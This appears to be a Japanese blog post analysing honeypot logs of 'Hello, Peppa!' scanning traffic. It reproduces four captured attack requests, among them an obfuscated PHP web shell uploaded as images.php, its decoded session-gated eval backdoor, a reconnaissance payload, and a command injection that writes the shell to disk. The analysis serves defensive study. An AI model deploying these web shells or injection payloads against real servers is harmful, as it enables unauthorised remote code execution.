Hello, Peppa!のアクセスログ

技術メモ

Hello, Peppa!

Hello, Peppa!という謎のアクセス - とりあえずブログ

「Hello, Peppa!」というこの気になるアクセス、私の運用しているWOWHoneypotにも来ていました。いくつかパターンがあったので、ログを抜き出してご紹介します。

ログその1

POST /cmx.php HTTP/1.1
Host:  xxx.xxx.xxx.xxx
User-Agent: Go-http-client/1.1
Content-Length: 5433
Accept: */*
Content-Type: multipart/form-data; boundary=------------------------c7145c544564e14d

--------------------------c7145c544564e14d
Content-Disposition: form-data; name="_upl"

Upload
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="h"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="w"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="leng"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="a"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="b"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="c"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="abc"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="0"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="cmd"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="php"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="1"
if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="bbs"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="m"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="js"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="2"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="3"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="!@#"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="ae"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="axa"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="aaaa"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="x"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="xx"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="eval"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="file"; filename="E:\\PHPnow\\htdocs\\images.php"
Content-Type: application/octet-stream

<?php $func='c'.'r'.'e'.'a'.'t'.'e'.'_'.'f'.'u'.'n'.'c'.'t'.'i'.'o'.'n';$test=$func('$x','e'.'v'.'a'.'l'.'(b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e($x));');$test('c2Vzc2lvbl9zdGFydCgpOwppZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpewooc3Vic3RyKHNoYTEobWQ1KCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpICYmICRfU0VTU0lPTlsndGhlQ29kZSddPXRyaW0oJF9QT1NUWydjb2RlJ10pOwp9CmlmKGlzc2V0KCRfU0VTU0lPTlsndGhlQ29kZSddKSl7CmV2YWwoYmFzZTY0X2RlY29kZSgkX1NFU1NJT05bJ3RoZUNvZGUnXSkpOwp9'); ?>Hello, Peppa!
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="fileupload"; filename="E:\\PHPnow\\htdocs\\images.php"
Content-Type: application/octet-stream

<?php $func='c'.'r'.'e'.'a'.'t'.'e'.'_'.'f'.'u'.'n'.'c'.'t'.'i'.'o'.'n';$test=$func('$x','e'.'v'.'a'.'l'.'(b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e($x));');$test('c2Vzc2lvbl9zdGFydCgpOwppZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpewooc3Vic3RyKHNoYTEobWQ1KCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpICYmICRfU0VTU0lPTlsndGhlQ29kZSddPXRyaW0oJF9QT1NUWydjb2RlJ10pOwp9CmlmKGlzc2V0KCRfU0VTU0lPTlsndGhlQ29kZSddKSl7CmV2YWwoYmFzZTY0X2RlY29kZSgkX1NFU1NJT05bJ3RoZUNvZGUnXSkpOwp9'); ?>Hello, Peppa!
--------------------------c7145c544564e14d--

multipart/form-data はファイルアップロードなどに使われるデータ形式ですね。cmx.php はWebShellとして使用されるファイル名のようです。(参考 : ハニーポット観察記録(36)「phpMyAdminの設定不備を狙ったWebShell作成の試み」 at www.morihi-soc.net

Base64エンコードされている部分のデコード結果は、以下のようになっていました。

session_start();
if(isset($_POST['code'])){
(substr(sha1(md5($_POST['a'])),36)=='222f') && $_SESSION['theCode']=trim($_POST['code']);
}
if(isset($_SESSION['theCode'])){
eval(base64_decode($_SESSION['theCode']));

処理自体に何か意味があるというよりは、これが実行できるかどうか、で脆弱性の有無を選り分けている感じでしょうか。

ログその2

POST /images.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
Accept: */*
Content-Length: 956
Content-Type: application/x-www-form-urlencoded

a=just+for+fun&code=aWYgKCFmdW5jdGlvbl9leGlzdHMoJ3Bvc2l4X2dldGVnaWQnKSkKewoJJHVzZXIgPSBAZ2V0X2N1cnJlbnRfdXNlcigpOwoJJHVpZCA9IEBnZXRteXVpZCgpOwoJJGdpZCA9IEBnZXRteWdpZCgpOwoJJGdyb3VwID0gIj8iOwp9CmVsc2UKewoJJHVpZCA9IEBwb3NpeF9nZXRwd3VpZChAcG9zaXhfZ2V0ZXVpZCgpKTsKCSRnaWQgPSBAcG9zaXhfZ2V0Z3JnaWQoQHBvc2l4X2dldGVnaWQoKSk7CgkkdWlkID0gJHVpZFsndWlkJ107CgkkdXNlciA9ICR1aWRbJ25hbWUnXTsKCSRnaWQgPSAkZ2lkWydnaWQnXTsKCSRncm91cCA9ICRnaWRbJ25hbWUnXTsKfQplY2hvICJIZWxsbywgUGVwcGEhfCIgLiBwaHBfdW5hbWUoKSAuIiArICIuICdVc2VyOicuJHVpZC4nKCcuJHVzZXIuJykvR3JvdXA6Jy4kZ2lkLicoJy4kZ3JvdXAuJyknIC4iICsgIi4kX1NFUlZFUlsnU0VSVkVSX1NPRlRXQVJFJ10gLiIgKyAiLiAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4iICsgIi4gJF9TRVJWRVJbJ1NDUklQVF9GSUxFTkFNRSddIC4gInwiOwokc2VsZiA9IHN1YnN0cigkX1NFUlZFUlsnUEhQX1NFTEYnXSxzdHJycG9zKCRfU0VSVkVSWydQSFBfU0VMRiddLCcvJykrMSk7CiR0aW1lID0gQHN0cnRvdGltZSgiMjAxNS0wNy0xNiAxNzozMjozMiIpOwplY2hvIChAdG91Y2goJHNlbGYsJHRpbWUsJHRpbWUpID8gJ3N1Y2Nlc3MnIDogJ2ZhaWxlZCcpOw%3D%3D

a=just+for+fun って本当にそうなのでしょうか……。その1と同様に、codeパラメータ以下をBase64デコードしてみると、以下のような結果となりました。

if (!function_exists('posix_getegid'))
{
    $user = @get_current_user();
    $uid = @getmyuid();
    $gid = @getmygid();
    $group = "?";
}
else
{
    $uid = @posix_getpwuid(@posix_geteuid());
    $gid = @posix_getgrgid(@posix_getegid());
    $uid = $uid['uid'];
    $user = $uid['name'];
    $gid = $gid['gid'];
    $group = $gid['name'];
}
echo "Hello, Peppa!|" . php_uname() ." + ". 'User:'.$uid.'('.$user.')/Group:'.$gid.'('.$group.')' ." + ".$_SERVER['SERVER_SOFTWARE'] ." + ". $_SERVER['DOCUMENT_ROOT'] ." + ". $_SERVER['SCRIPT_FILENAME'] . "|";
$self = substr($_SERVER['PHP_SELF'],strrpos($_SERVER['PHP_SELF'],'/')+1);
$time = @strtotime("2015-07-16 17:32:32");
��ho (@touch($self,$time,$time) ? 'success' : 'failed');

最後の行はなぜか文字化けしてしまいましたが、おそらく「echo」ですね。サーバの情報をいろいろと出力させようとしている感じ。

ログその3

GET /cmx.php?cmd=echo+%5E%3C%3Fphp+%24func%3D%27c%27.%27r%27.%27e%27.%27a%27.%27t%27.%27e%27.%27_%27.%27f%27.%27u%27.%27n%27.%27c%27.%27t%27.%27i%27.%27o%27.%27n%27%3B%24test%3D%24func%28%27%24x%27%2C%27e%27.%27v%27.%27a%27.%27l%27.%27%28b%27.%27a%27.%27s%27.%27e%27.%276%27.%274%27.%27_%27.%27d%27.%27e%27.%27c%27.%27o%27.%27d%27.%27e%28%24x%29%29%3B%27%29%3B%24test%28%27c2Vzc2lvbl9zdGFydCgpOwppZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpewooc3Vic3RyKHNoYTEobWQ1KCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpICYmICRfU0VTU0lPTlsndGhlQ29kZSddPXRyaW0oJF9QT1NUWydjb2RlJ10pOwp9CmlmKGlzc2V0KCRfU0VTU0lPTlsndGhlQ29kZSddKSl7CmV2YWwoYmFzZTY0X2RlY29kZSgkX1NFU1NJT05bJ3RoZUNvZGUnXSkpOwp9%27%29%3B+%3F%5E%3E+%3Eimages.php+%26+echo+Hello%2C+Peppa%21 HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Go-http-client/1.1
Accept: */*

URLデコードすると以下のようになります。

echo ^<?php $func='c'.'r'.'e'.'a'.'t'.'e'.'_'.'f'.'u'.'n'.'c'.'t'.'i'.'o'.'n';$test=$func('$x','e'.'v'.'a'.'l'.'(b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e($x));');$test('c2Vzc2lvbl9zdGFydCgpOwppZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpewooc3Vic3RyKHNoYTEobWQ1KCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpICYmICRfU0VTU0lPTlsndGhlQ29kZSddPXRyaW0oJF9QT1NUWydjb2RlJ10pOwp9CmlmKGlzc2V0KCRfU0VTU0lPTlsndGhlQ29kZSddKSl7CmV2YWwoYmFzZTY0X2RlY29kZSgkX1NFU1NJT05bJ3RoZUNvZGUnXSkpOwp9'); ?^> >images.php & echo Hello, Peppa!

$testの中の文字列は、ログその1のものと同じです。

ログその4

POST /db_session.init.php HTTP/1.1
Host: xxx.xxx.xxx.xxx:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

eval=die('Hello, Peppa!'.(string)(111111111*9));

こちらも処理自体にはそれほど意味はない気がしますね。

Hello, Peppa!、WOWHoneypotのログを見たところ、5月4日くらいから観測されているのですが、ネット上にはあまり情報が見られないです。検索してヒットする情報も、2018年の5月〜6月のものなので、何か新しいスキャナなのでしょうか……。引き続きログの観察と情報の収集を行っていきたいと思います。

参考